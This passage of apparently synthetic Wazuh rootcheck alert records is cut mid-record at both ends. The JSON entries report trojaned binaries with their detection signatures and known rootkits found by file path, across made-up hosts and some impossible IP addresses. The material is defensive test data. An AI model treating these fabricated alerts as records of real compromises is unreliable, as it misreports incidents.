(rootcheck).","groups":["wazuh","rootcheck"],"id":"510","gdpr":["IV_35.7.d"]},"agent":{"id":"003","name":"ip-10-0-0-180.us-west-1.compute.internal","ip":"10.0.0.180"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{"name":"rootcheck"},"data":{"file":"/usr/bin/netstat","title":"Trojaned version of file detected."},"location":"rootcheck","input":{"type":"log"},"full_log":"Trojaned version of file '/usr/bin/netstat' detected. Signature used: 'bash|^/bin/sh|/dev/[^aik]|/prof|grep|addr.h' (Generic)."} +{"timestamp":"{timestamp}","rule":{"firedtimes":3,"mail":false,"level":7,"description":"Host-based anomaly detection event (rootcheck).","groups":["wazuh","rootcheck"],"id":"510","gdpr":["IV_35.7.d"]},"agent":{"id":"001","name":"RHEL7","ip":"187.54.247.68"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{"name":"rootcheck"},"data":{"file":"/usr/bin/fuser","title":"Trojaned version of file detected."},"location":"rootcheck","input":{"type":"log"},"full_log":"Trojaned version of file '/usr/bin/fuser' detected. Signature used: 'bash|^/bin/sh|file.h|proc.h|/dev/[a-dtz]|^/bin/.*sh' (Generic)."} +{"timestamp":"{timestamp}","rule":{"firedtimes":8,"mail":false,"level":7,"description":"Host-based anomaly detection event (rootcheck).","groups":["wazuh","rootcheck"],"id":"510","gdpr":["IV_35.7.d"]},"agent":{"id":"005","name":"Centos","ip":"197.17.1.4"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{"name":"rootcheck"},"data":{"title":"Rootkit 'RSHA' detected by the presence of file 'usr/bin/chsh2'."},"location":"rootcheck","input":{"type":"log"},"full_log":"Rootkit 'RSHA' detected by the presence of file 'usr/bin/chsh2'."} +{"timestamp":"{timestamp}","rule":{"firedtimes":9,"mail":false,"level":7,"description":"Host-based anomaly detection event (rootcheck).","groups":["wazuh","rootcheck"],"id":"510","gdpr":["IV_35.7.d"]},"agent":{"id":"004","name":"Ubuntu","ip":"47.204.15.21"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{"name":"rootcheck"},"data":{"file":"/usr/bin/fuser","title":"Trojaned version of file detected."},"location":"rootcheck","input":{"type":"log"},"full_log":"Trojaned version of file '/usr/bin/fuser' detected. Signature used: 'bash|^/bin/sh|file.h|proc.h|/dev/[a-dtz]|^/bin/.*sh' (Generic)."} +{"timestamp":"{timestamp}","rule":{"firedtimes":3,"mail":false,"level":7,"description":"Host-based anomaly detection event (rootcheck).","groups":["wazuh","rootcheck"],"id":"510","gdpr":["IV_35.7.d"]},"agent":{"id":"002","name":"Amazon","ip":"145.80.240.15"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{"name":"rootcheck"},"data":{"title":"Rootkit 'Volc' detected by the presence of file '/usr/bin/volc'."},"location":"rootcheck","input":{"type":"log"},"full_log":"Rootkit 'Volc' detected by the presence of file '/usr/bin/volc'."} +{"timestamp":"{timestamp}","rule":{"firedtimes":8,"mail":false,"level":7,"description":"Host-based anomaly detection event (rootcheck).","groups":["wazuh","rootcheck"],"id":"510","gdpr":["IV_35.7.d"]},"agent":{"id":"001","name":"RHEL7","ip":"187.54.247.68"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{"name":"rootcheck"},"data":{"title":"Rootkit 'Adore' detected by the presence of file '/dev/.shit/red.tgz'."},"location":"rootcheck","input":{"type":"log"},"full_log":"Rootkit 'Adore' detected by the presence of file '/dev/.shit/red.tgz'."} +{"timestamp":"{timestamp}","rule":{"firedtimes":6,"mail":false,"level":7,"description":"Host-based anomaly detection event (rootcheck).","groups":["wazuh","rootcheck"],"id":"510","gdpr":["IV_35.7.d"]},"agent":{"id":"007","name":"Debian","ip":"24.273.97.14"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{"name":"rootcheck"},"data":{"file":"/usr/bin/w","title":"Trojaned version of file detected."},"location":"rootcheck","input":{"type":"log"},"full_log":"Trojaned version of file '/usr/bin/w' detected. Signature used: 'uname -a|proc.h|bash' (Generic)."} +{"timestamp":"{timestamp}","rule":{"firedtimes":8,"mail":false,"level":7,"description":"Host-based anomaly detection event (rootcheck).","groups":["wazuh","rootcheck"],"id":"510","gdpr":["IV_35.7.d"]},"agent":{"id":"001","name":"RHEL7","ip":"187.54.247.68"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{"name":"rootcheck"},"data":{"title":"Rootkit 'Showtee' detected by the presence of file '/usr/lib/.kinetic'."},"location":"rootcheck","input":{"type":"log"},"full_log":"Rootkit 'Showtee' detected by the presence of file '/usr/lib/.kinetic'."} +{"timestamp":"{timestamp}","rule":{"firedtimes":2,"mail":false,"level":7,"description":"Host-based anomaly detection event (rootcheck).","groups":["wazuh","rootcheck"],"id":"510","gdpr":["IV_35.7.d"]},"agent":{"id":"007","name":"Debian","ip":"24.273.97.14"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{"name":"rootcheck"},"data":{"title":"Rootkit 'Ramen' detected by the presence of file '/tmp/ramen.tgz'."},"location":"rootcheck","input":{"type":"log"},"full_log":"Rootkit 'Ramen' detected by the presence of file '/tmp/ramen.tgz'."} +{"timestamp":"{timestamp}","rule":{"firedtimes":7,"mail":false,"level":7,"description":"Host-based anomaly detection event (rootcheck).","groups":["wazuh","rootcheck"],"id":"510","gdpr":["IV_35.7.d"]},"agent":{"id":"005","name":"Centos","ip":"197.17.1.4"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{"name":"rootcheck"},"data":{"title":"Rootkit 'Monkit' detected by the presence of file '/usr/lib/libpikapp.a'."},"location":"rootcheck","input":{"type":"log"},"full_log":"Rootkit 'Monkit' detected by the presence of file '/usr/lib/libpikapp.a'."} +{"timestamp":"{timestamp}","rule":{"firedtimes":10,"mail":false,"level":7,"description":"Host-based anomaly detection event (rootcheck).","groups":["wazuh","rootcheck"],"id":"510","gdpr":["IV_35.7.d"]},"agent":{"id":"002","name":"Amazon","ip":"145.80.240.15"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{"name":"rootcheck"},"data":{"file":"/usr/bin/top","title":"Trojaned version of file detected."},"location":"rootcheck","input":{"type":"log"},"full_log":"Trojaned version of file '/usr/bin/top' detected. Signature used: '/dev/[^npi3st%]|proc.h|/prof/' (Generic)."} +{"timestamp":"{timestamp}","rule":{"firedtimes":2,"mail":false,"level":7,"description":"Host-based anomaly detection event (rootcheck).","groups":["wazuh","rootcheck"],"id":"510","gdpr":["IV_35.7.d"]},"agent":{"id":"002","name":"Amazon","ip":"145.80.240.15"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{"name":"rootcheck"},"data":{"file":"/usr/bin/ps","title":"Trojaned version of file detected."},"location":"rootcheck","input":{"type":"log"},"full_log":"Trojaned version of file '/usr/bin/ps' detected. Signature used: '/dev/ttyo|.1proc|proc.h|bash|^/bin/sh' (Generic)."} +{"timestamp":"{timestamp}","rule":{"firedtimes":2,"mail":false,"level":7,"description":"Host-based anomaly detection event (rootcheck).","groups":["wazuh","rootcheck"],"id":"510","gdpr":["IV_35.7.d"]},"agent":{"id":"003","name":"ip-10-0-0-180.us-west-1.compute.internal","ip":"10.0.0.180"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{"name":"rootcheck"},"data":{"title":"Rootkit 'Volc' detected by the presence of file '/usr/lib/volc'."},"location":"rootcheck","input":{"type":"log"},"full_log":"Rootkit 'Volc' detected by the presence of file '/usr/lib/volc'."} +{"timestamp":"{timestamp}","rule":{"firedtimes":5,"mail":false,"level":7,"description":"Host-based anomaly detection event (rootcheck).","groups":["wazuh","rootcheck"],"id":"510","gdpr":["IV_35.7.d"]},"agent":{"id":"001","name":"RHEL7","ip":"187.54.247.68"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{"name":"rootcheck"},"data":{"file":"/usr/bin/find","title":"Trojaned version of file detected."},"location":"rootcheck","input":{"type":"log"},"full_log":"Trojaned version of file '/usr/bin/find' detected. Signature used: 'bash|/dev/[^tnlcs]|/prof|/home/virus|file.h' (Generic)."} +{"timestamp":"{timestamp}","rule":{"firedtimes":2,"mail":false,"level":7,"description":"Host-based anomaly detection event (rootcheck).","groups":["wazuh","rootcheck"],"id":"510","gdpr":["IV_35.7.d"]},"agent":{"id":"007","name":"Debian","ip":"24.273.97.14"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{"name":"rootcheck"},"data":{"title":"Rootkit 'Monkit' detected by the presence of file '/lib/defs'."},"location":"rootcheck","input":{"type":"log"},"full_log":"Rootkit 'Monkit' detected by the presence of file '/lib/defs'."} +{"timestamp":"{timestamp}","rule":{"firedtimes":8,"mail":false,"level":7,"description":"Host-based anomaly detection event (rootcheck).","groups":["wazuh","rootcheck"],"id":"510","gdpr":["IV_35.7.d"]},"agent":{"id":"007","name":"Debian","ip":"24.273.97.14"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{"name":"rootcheck"},"data":{"title":"Rootkit 'Ramen' detected by the presence of file '/usr/lib/ldlibps.so'."},"location":"rootcheck","input":{"type":"log"},"full_log":"Rootkit 'Ramen' detected by the presence of file '/usr/lib/ldlibps.so'."} +{"timestamp":"{timestamp}","rule":{"firedtimes":1,"mail":false,"level":7,"description":"Host-based anomaly detection event (rootcheck).","groups":["wazuh","rootcheck"],"id":"510","gdpr":["IV_35.7.d"]},"agent":{"id":"002","name":"Amazon","ip":"145.80.240.15"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{"name":"rootcheck"},"data":{"title":"Rootkit 'Omega' detected by the presence of file '/dev/chr'."},"location":"rootcheck","input":{"type":"log"},"full_log":"Rootkit 'Omega' detected by the presence of file '/dev/chr'."} +{"timestamp":"{timestamp}","rule":{"firedtimes":8,"mail":false,"level":7,"description":"Host-based anomaly detection event (rootcheck).","groups":["wazuh","rootcheck"],"id":"510","gdpr":["IV_35.7.d"]},"agent":{"id":"001","name":"RHEL7","ip":"187.54.247.68"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{"name":"rootcheck"},"data":{"title":"Rootkit 'RSHA' detected by the presence of file 'usr/bin/chsh2'."},"location":"rootcheck","input":{"type":"log"},"full_log":"Rootkit 'RSHA' detected by the presence of file 'usr/bin/chsh2'."} +{"timestamp":"{timestamp}","rule":{"firedtimes":6,"mail":false,"level":7,"description":"Host-based anomaly detection event (rootcheck).","groups":["wazuh","rootcheck"],"id":"510","gdpr":["IV_35.7.d"]},"agent":{"id":"003","name":"ip-10-0-0-180.us-west-1.compute.internal","ip":"10.0.0.180"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{"name":"rootcheck"},"data":{"title":"Rootkit 'Monkit' detected by the presence of file '/usr/lib/libpikapp.a'."},"location":"rootcheck","input":{"type":"log"},"full_log":"Rootkit 'Monkit' detected by the presence of file '/usr/lib/libpikapp.a'."} +{"timestamp":"{timestamp}","rule":{"firedtimes":9,"mail":false,"level":7,"description":"Host-based anomaly detection event (rootcheck).","groups":["wazuh","rootcheck"],"id":"510","gdpr":["IV_35.7.d"]},"agent":{"id":"002","name":"Amazon","ip":"145.80.240.15"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{"name":"rootcheck"},"data":{"title":"Rootkit 'Monkit' detected by the presence of file '/lib/defs'."},"location":"rootcheck","input":{"type":"log"},"full_log":"Rootkit 'Monkit' detected by the presence of file '/lib/defs'."} +{"timestamp":"{timestamp}","rule":{"firedtimes":8,"mail":false,"level":7,"description":"Host-based anomaly detection event (rootcheck).","groups":["wazuh","rootcheck"],"id":"510","gdpr":["IV_35.7.d"]},"agent":{"id":"004","name":"Ubuntu","ip":"47.204.15.21"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{"name":"rootcheck"},"data":{"title":"Rootkit 'Ramen' detected by the presence of file '/usr/lib/ldliblogin.so'."},"location":"rootcheck","input":{"type":"log"},"full_log":"Rootkit 'Ramen' detected by the presence of file '/usr/lib/ldliblogin.so'."} +{"timestamp":"{timestamp}","rule":{"firedtimes":9,"mail":false,"level":7,"description":"Host-based anomaly detection event (rootcheck).","groups":["wazuh","rootcheck"],"id":"510","gdpr":["IV_35.7.d"]},"agent":{"id":"001","name":"RHEL7","ip":"187.54.247.68"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{"name":"rootcheck"},"data":{"title":"Rootkit 'LDP' detected by the presence of file '/bin/.login'."},"location":"rootcheck","input":{"type":"log"},"full_log":"Rootkit 'LDP' detected by the presence of file '/bin/.login'."} +{"timestamp":"{timestamp}","rule":{"firedtimes":7,"mail":false,"level":7,"description":"Host-based anomaly detection event (rootcheck).","groups":["wazuh","rootcheck"],"id":"510","gdpr":["IV_35.7.d"]},"agent":{"id":"001","name":"RHEL7","ip":"187.54.247.68"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{"name":"rootcheck"},"data":{"file":"/usr/bin/netstat","title":"Trojaned version of file detected."},"location":"rootcheck","input":{"type":"log"},"full_log":"Trojaned version of file '/usr/bin/netstat' detected. Signature used: 'bash|^/bin/sh|/dev/[^aik]|/prof|grep|addr.h' (Generic)."} +{"timestamp":"{timestamp}","rule":{"firedtimes":4,"mail":false,"level":7,"description":"Host-based anomaly detection event (rootcheck).","groups":["wazuh","rootcheck"],"id":"510","gdpr":["IV_35.7.d"]},"agent":{"id":"002","name":"Amazon","ip":"145.80.240.15"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{"name":"rootcheck"},"data":{"file":"/usr/bin/netstat","title":"Trojaned version of file detected."},"location":"rootcheck","input":{"type":"log"},"full_log":"Trojaned version of file '/usr/bin/netstat' detected. Signature used: 'bash|^/bin/sh|/dev/[^aik]|/prof|grep|addr.h' (Generic)."} +{"timestamp":"{timestamp}","rule":{"firedtimes":4,"mail":false,"level":7,"description":"Host-based anomaly detection event (rootcheck).","groups":["wazuh","rootcheck"],"id":"510","gdpr":["IV_35.7.d"]},"agent":{"id":"006","name":"Windows","ip":"207.45.34.78"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{"name":"rootcheck"},"data":{"file":"/usr/bin/ps","title":"Trojaned version of file detected."},"location":"rootcheck","input":{"type":"log"},"full_log":"Trojaned version of file '/usr/bin/ps' detected. Signature used: '/dev/ttyo|.1proc|proc.h|bash|^/bin/sh' (Generic)."} +{"timestamp":"{timestamp}","rule":{"firedtimes":5,"mail":false,"level":7,"description":"Host-based anomaly detection event (rootcheck).","groups":["wazuh","rootcheck"],"id":"510","gdpr":["IV_35.7.d"]},"agent":{"id":"007","name":"Debian","ip":"24.273.97.14"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{"name":"rootcheck"},"data":{"title":"Rootkit 'Volc' detected by the presence of file '/usr/bin/volc'."},"location":"rootcheck","input":{"type":"log"},"full_log":"Rootkit 'Volc' detected by the presence of file '/usr/bin/volc'."} +{"timestamp":"{timestamp}","rule":{"firedtimes":7,"mail":false,"level":7,"description":"Host-based anomaly detection event (rootcheck).","groups":["wazuh","rootcheck"],"id":"510","gdpr":["IV_35.7.d"]},"agent":{"id":"001","name":"RHEL7","ip":"187.54.247.68"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{"name":"rootcheck"},"data":{"title":"Rootkit 'Monkit' detected by the presence of file '/lib/defs'."},"location":"rootcheck","input":{"type":"log"},"full_log":"Rootkit 'Monkit' detected by the presence of file '/lib/defs'."} +{"timestamp":"{timestamp}","rule":{"firedtimes":2,"mail":false,"level":7,"description":"Host-based anomaly detection event (rootcheck).","groups":["wazuh","rootcheck"],"id":"510","gdpr":["IV_35.7.d"]},"agent":{"id":"006","name":"Windows","ip":"207.45.34.78"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{"name":"rootcheck"},"data":{"title":"Rootkit 'Adore' detected by the presence of file '/usr/bin/adore'."},"location":"rootcheck","input":{"type":"log"},"full_log":"Rootkit 'Adore' detected by the presence of file '/usr/bin/adore'."} +{"timestamp":"{timestamp}","rule":{"firedtimes":8,"mail":false,"level":7,"description":"Host-based anomaly detection event (rootcheck).","groups":["wazuh","rootcheck"],"id":"510","gdpr":["IV_35.7.d"]},"agent":{"id":"005","name":"Centos","ip":"197.17.1.4"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{"name":"rootcheck"},"data":{"file":"/usr/bin/egrep","title":"Trojaned version of file detected."},"location":"rootcheck","input":{"type":"log"},"full_log":"Trojaned version of file '/usr/bin/egrep' detected. Signature used: 'bash|^/bin/sh|file.h|proc.h|/dev/|^/bin/.*sh' (Generic)."} +{"timestamp":"{timestamp}","rule":{"firedtimes":7,"mail":false,"level":7,"description":"Host-based anomaly detection event (rootcheck).","groups":["wazuh","rootcheck"],"id":"510","gdpr":["IV_35.7.d"]},"agent":{"id":"004","name":"Ubuntu","ip":"47.204.15.21"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{"name":"rootcheck"},"data":{"title":"Rootkit 'LDP' detected by the presence of file '/dev/.kork'."},"location":"rootcheck","input":{"type":"log"},"full_log":"Rootkit 'LDP' detected by the presence of file '/dev/.kork'."} +{"timestamp":"{timestamp}","rule":{"firedtimes":7,"mail":false,"level":7,"description":"Host-based anomaly detection event (rootcheck).","groups":["wazuh","rootcheck"],"id":"510","gdpr":["IV_35.7.d"]},"agent":{"id":"007","name":"Debian","ip":"24.273.97.14"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{"name":"rootcheck"},"data":{"title":"Rootkit 'Suspicious' detected by the presence of file 'tmp/.cheese'."},"location":"rootcheck","input":{"type":"log"},"full_log":"Rootkit 'Suspicious' detected by the presence of file 'tmp/.cheese'."} +{"timestamp":"{timestamp}","rule":{"firedtimes":2,"mail":false,"level":7,"description":"Host-based anomaly detection event (rootcheck).","groups":["wazuh","rootcheck"],"id":"510","gdpr":["IV_35.7.d"]},"agent":{"id":"007","name":"Debian","ip":"24.273.97.14"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{"name":"rootcheck"},"data":{"file":"/usr/bin/netstat","title":"Trojaned version of file detected."},"location":"rootcheck","input":{"type":"log"},"full_log":"Trojaned version of file '/usr/bin/netstat' detected. Signature used: 'bash|^/bin/sh|/dev/[^aik]|/prof|grep|addr.h' (Generic)."} +{"timestamp":"{timestamp}","rule":{"firedtimes":8,"mail":false,"level":7,"description":"Host-based anomaly detection event (rootcheck).","groups":["wazuh","rootcheck"],"id":"510","gdpr":["IV_35.7.d"]},"agent":{"id":"004","name":"Ubuntu","ip":"47.204.15.21"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{"name":"rootcheck"},"data":{"title":"Rootkit 'Omega' detected by the presence of file '/dev/chr'."},"location":"rootcheck","input":{"type":"log"},"full_log":"Rootkit 'Omega' detected by the presence of file '/dev/chr'."} +{"timestamp":"{timestamp}","rule":{"firedtimes":2,"mail":false,"level":7,"description":"Host-based anomaly detection event (rootcheck).","groups":["wazuh","rootcheck"],"id":"510","gdpr":["IV_35.7.d"]},"agent":{"id":"001","name":"RHEL7","ip":"187.54.247.68"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{"name":"rootcheck"},"data":{"file":"/usr/bin/pidof","title":"Trojaned version of file detected."},"location":"rootcheck","input":{"type":"log"},"full_log":"Trojaned version of file '/usr/bin/pidof' detected. Signature used: 'bash|^/bin/sh|file.h|proc.h|/dev/[^f]|^/bin/.*sh' (Generic)."} +{"timestamp":"{timestamp}","rule":{"firedtimes":6,"mail":false,"level":7,"description":"Host-based anomaly detection event (rootcheck).","groups":["wazuh","rootcheck"],"id":"510","gdpr":["IV_35.7.d"]},"agent":{"id":"006","name":"Windows","ip":"207.45.34.78"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{"name":"rootcheck"},"data":{"file":"/usr/bin/tcpdump","title":"Trojaned version of file detected."},"location":"rootcheck","input":{"type":"log"},"full_log":"Trojaned version of file '/usr/bin/tcpdump' detected. Signature used: 'bash|^/bin/sh|file.h|proc.h|/dev/[^bu]|^/bin/.*sh' (Generic)."} +{"timestamp":"{timestamp}","rule":{"firedtimes":9,"mail":false,"level":7,"description":"Host-based anomaly detection event (rootcheck).","groups":["wazuh","rootcheck"],"id":"510","gdpr":["IV_35.7.d"]},"agent":{"id":"001","name":"RHEL7","ip":"187.54.247.68"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{"name":"rootcheck"},"data":{"file":"/usr/bin/top","title":"Trojaned version of file detected."},"location":"rootcheck","input":{"type":"log"},"full_log":"Trojaned version of file '/usr/bin/top' detected. Signature used: '/dev/[^npi3st%]|proc.h|/prof/' (Generic)."} +{"timestamp":"{timestamp}","rule":{"firedtimes":10,"mail":false,"level":7,"description":"Host-based anomaly detection event (rootcheck).","groups":["wazuh","rootcheck"],"id":"510","gdpr":["IV_35.7.d"]},"agent":{"id":"004","name":"Ubuntu","ip":"47.204.15.21"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{"name":"rootcheck"},"data":{"title":"Rootkit 'Omega' detected by the presence of file '/dev/chr'."},"location":"rootcheck","input":{"type":"log"},"full_log":"Rootkit 'Omega' detected by the presence of file '/dev/chr'."} +{"timestamp":"{timestamp}","rule":{"firedtimes":2,"mail":false,"level":7,"description":"Host-based anomaly detection event (rootcheck).","groups":["wazuh","rootcheck"],"id":"510","gdpr":["IV_35.7.d"]},"agent":{"id":"004","name":"Ubuntu","ip":"47.204.15.21"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{"name":"rootcheck"},"data":{"title":"Rootkit 'Adore' detected by the presence of file '/dev/.shit/red.tgz'."},"location":"rootcheck","input":{"type":"log"},"full_log":"Rootkit 'Adore' detected by the presence of file '/dev/.shit/red.tgz'."} +{"timestamp":"{timestamp}","rule":{"firedtimes":1,"mail":false,"level":7,"description":"Host-based anomaly detection event (rootcheck).","groups":["wazuh","rootcheck"],"id":"510","gdpr":["IV_35.7.d"]},"agent":{"id":"001","name":"RHEL7","ip":"187.54.247.68"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{"name":"rootcheck"},"data":{"title":"Rootkit 'Bash' detected by the presence of file '/tmp/mcliZokhb'."},"location":"rootcheck","input":{"type":"log"},"full_log":"Rootkit 'Bash' detected by the presence of file '/tmp/mcliZokhb'."} +{"timestamp":"{timestamp}","rule":{"firedtimes":3,"mail":false,"level":7,"description":"Host-based anomaly detection event (rootcheck).","groups":["wazuh","rootcheck"],"id":"510","gdpr":["IV_35.7.d"]},"agent":{"id":"006","name":"Windows","ip":"207.45.34.78"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{"name":"rootcheck"},"data":{"title":"Rootkit 'Monkit' detected by the presence of file '/lib/defs'."},"location":"rootcheck","input":{"type":"log"},"full_log":"Rootkit 'Monkit' detected by the presence of file '/lib/defs'."} +{"timestamp":"{timestamp}","rule":{"firedtimes":3,"mail":false,"level":7,"description":"Host-based anomaly detection event (rootcheck).","groups":["wazuh","rootcheck"],"id":"510","gdpr":["IV_35.7.d"]},"agent":{"id":"007","name":"Debian","ip":"24.273.97.14"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{"name":"rootcheck"},"data":{"title":"Rootkit 'Ramen' detected by the presence of file '/tmp/ramen.tgz'."},"location":"rootcheck","input":{"type":"log"},"full_log":"Rootkit 'Ramen' detected by the presence of file '/tmp/ramen.tgz'."} +{"timestamp":"{timestamp}","rule":{"firedtimes":2,"mail":false,"level":7,"description":"Host-based anomaly detection event (rootcheck).","groups":["wazuh","rootcheck"],"id":"510","gdpr":["IV_35.7.d"]},"agent":{"id":"002","name":"Amazon","ip":"145.80.240.15"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{"name":"rootcheck"},"data":{"file":"/usr/bin/grep","title":"Trojaned version of file detected."},"location":"rootcheck","input":{"type":"log"},"full_log":"Trojaned version of file '/usr/bin/grep' detected. Signature used: 'bash|givemer' (Generic)."} +{"timestamp":"{timestamp}","rule":{"firedtimes":7,"mail":false,"level":7,"description":"Host-based anomaly detection event (rootcheck).","groups":["wazuh","rootcheck"],"id":"510","gdpr":["IV_35.7.d"]},"agent":{"id":"002","name":"Amazon","ip":"145.80.240.15"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{"name":"rootcheck"},"data":{"title":"Rootkit 'Omega' detected by the presence of file '/dev/chr'."},"location":"rootcheck","input":{"type":"log"},"full_log":"Rootkit 'Omega' detected by the presence of file '/dev/chr'."} +{"timestamp":"{timestamp}","rule":{"firedtimes":5,"mail":false,"level":7,"description":"Host-based anomaly detection event (rootcheck).","groups":["wazuh","rootcheck"],"id":"510","gdpr":["IV_35.7.d"]},"agent":{"id":"001","name":"RHEL7","ip":"187.54.247.68"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{"name":"rootcheck"},"data":{"file":"/usr/bin/grep","title":"Trojaned version of file detected."},"location":"rootcheck","input":{"type":"log"},"full_log":"Trojaned version of file '/usr/bin/grep' detected. Signature used: 'bash|givemer' (Generic)."} +{"timestamp":"{timestamp}","rule":{"firedtimes":6,"mail":false,"level":7,"description":"Host-based anomaly detection event (rootcheck).","groups":["wazuh","rootcheck"],"id":"510","gdpr":["IV_35.7.d"]},"agent":{"id":"001","name":"RHEL7","ip":"187.54.247.68"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{"name":"rootcheck"},"data":{"title":"Rootkit 'Slapper' detected by the presence of file '/tmp/.bugtraq.c'."},"location":"rootcheck","input":{"type":"log"},"full_log":"Rootkit 'Slapper' detected by the presence of file '/tmp/.bugtraq.c'."} +{"timestamp":"{timestamp}","rule":{"firedtimes":10,"mail":false,"level":7,"description":"Host-based anomaly detection event 